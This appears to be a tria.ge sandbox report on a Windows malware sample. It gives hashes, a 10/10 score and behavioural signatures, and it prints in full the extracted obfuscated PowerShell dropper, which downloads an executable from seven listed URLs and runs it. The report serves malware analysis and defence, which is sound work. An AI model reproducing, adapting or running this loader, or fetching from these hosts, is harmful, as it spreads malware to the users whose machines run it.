Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    f01d6d3b9c98457e3843692915af1efa_JaffaCakes118

  • Size

    241KB

  • Sample

    240921-s52bcszela

  • MD5

    f01d6d3b9c98457e3843692915af1efa

  • SHA1

    dd4724db788347778cd9f8a15bb8e67e6e445739

  • SHA256

    1dba1999448c671df16e2a851f3333c25852991b9e4e9218fe5f59c4892750b9

  • SHA512

    c7f0210f9349734b4795539a44eac52788c64785213f9a2b2eb5c2bf188dd5202c7026e457be1e9d725a7ce1fbed60e6d46daabe84d76dd81cec18f0c210ad2f

  • SSDEEP

    3072:wYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////j:40uXnWFchmmcI/o1/YOfAx

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$C6d_2s8=(('Mw'+'w')+'k1'+'nm');&('ne'+'w'+'-item') $EnV:USerPROFile\G10pgi8\ZTTxB4O\ -itemtype dIrEcTOry;[Net.ServicePointManager]::"SE`cUR`ITyproTOc`OL" = (('t'+'ls1')+'2'+(','+' tl')+('s'+'11, ')+'tl'+'s');$W0lji9e = ('F'+'ux'+('8'+'6v'));$Kslf6uf=(('Bvi'+'gn')+'6e');$Qo4fnc3=$env:userprofile+(('{0'+'}'+'G10pgi8{0'+'}Zttxb4o{0}') -F [chAR]92)+$W0lji9e+('.'+('e'+'xe'));$T579vww=('Q'+('hop'+'s')+'fr');$Wcu1otx=&('ne'+'w-objec'+'t') nEt.WebcLIeNt;$Dj4qjax=(('http'+'://ww'+'w'+'.ksg')+('res'+'ear'+'ch'+'.org/LLC'+'/'+'z9B/*')+'h'+('tt'+'p')+(':'+'//ww')+('w.mitr'+'au'+'sah')+'a'+('co'+'ntr')+'uc'+'io'+'n'+'.c'+'o'+('m'+'/m')+('ult'+'i'+'fu'+'nction'+'al-se')+('ct'+'i')+'on'+'/'+'X2'+('v4X'+'N/')+('*h'+'t')+'t'+('p:'+'//da'+'pr'+'ofes'+'iona'+'l.')+'c'+'o'+('m/dat'+'a4/rs'+'dbA')+'1h'+('/'+'*http')+('://de'+'g'+'is')+'i'+('mkalip'+'.')+('c'+'om.tr/')+('wp-ad'+'min'+'/ZML/'+'*')+'ht'+('tp:'+'//da')+('-in'+'du')+'s'+('tr'+'i')+'a'+'l'+('.'+'com/js/'+'6')+('GGA48'+'AK/'+'*')+('h'+'ttp:')+('/'+'/cse-e')+('ng'+'i')+'n'+('eer'+'.com'+'/c'+'gi-bin/BO'+'iL/')+'*h'+('tt'+'p')+(':/'+'/casa')+('be'+'etho')+('venlb'+'.')+('c'+'om/c'+'las')+('ses/7S'+'U')+('l'+'G/'))."s`PlIT"([char]42);$Nmyspmc=(('Jqu'+'1')+('rg'+'_'));foreach($Blu7x4_ in $Dj4qjax){try{$Wcu1otx."Do`WnLOA`dF`iLe"($Blu7x4_, $Qo4fnc3);$Cj7c0y9=('W'+('ut'+'x')+('g1'+'y'));If ((&('G'+'et-Item') $Qo4fnc3)."LEng`Th" -ge 38152) {.('Invo'+'ke'+'-Ite'+'m')($Qo4fnc3);$Ayagw7p=('J'+('vec8'+'k')+'q');break;$Cmjkpj6=(('Wx64p'+'n')+'x')}}catch{}}$Qwqs0er=(('Ll'+'vd')+('41'+'_'))
URLs
exe.dropper

http://www.ksgresearch.org/LLC/z9B/

exe.dropper

http://www.mitrausahacontrucion.com/multifunctional-section/X2v4XN/

exe.dropper

http://daprofesional.com/data4/rsdbA1h/

exe.dropper

http://degisimkalip.com.tr/wp-admin/ZML/

exe.dropper

http://da-industrial.com/js/6GGA48AK/

exe.dropper

http://cse-engineer.com/cgi-bin/BOiL/

exe.dropper

http://casabeethovenlb.com/classes/7SUlG/

Targets

    • Target

      f01d6d3b9c98457e3843692915af1efa_JaffaCakes118

    • Size

      241KB

    • MD5

      f01d6d3b9c98457e3843692915af1efa

    • SHA1

      dd4724db788347778cd9f8a15bb8e67e6e445739

    • SHA256

      1dba1999448c671df16e2a851f3333c25852991b9e4e9218fe5f59c4892750b9

    • SHA512

      c7f0210f9349734b4795539a44eac52788c64785213f9a2b2eb5c2bf188dd5202c7026e457be1e9d725a7ce1fbed60e6d46daabe84d76dd81cec18f0c210ad2f

    • SSDEEP

      3072:wYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////j:40uXnWFchmmcI/o1/YOfAx

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.